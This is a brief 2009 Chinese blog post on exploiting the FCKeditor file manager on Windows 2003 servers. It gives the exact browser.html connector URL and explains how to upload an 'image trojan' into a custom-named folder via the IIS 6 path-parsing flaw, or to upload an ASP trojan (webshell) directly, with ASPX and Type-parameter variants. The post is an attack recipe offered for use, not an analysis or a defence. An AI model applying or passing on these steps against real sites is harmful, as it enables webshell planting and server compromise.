fckeditor漏洞利用(仅针对WIN2003有效) | 飘零的代码 piao2010 's blog

fckeditor漏洞利用(仅针对WIN2003有效)

http://websiteX/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马，利用2003路径解析漏洞，也可以直接上传ASP木马。

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如：

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

相关日志

This entry was posted on 星期六, 3月 14th, 2009 at 11:29 and is filed under 搬家之前. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a Reply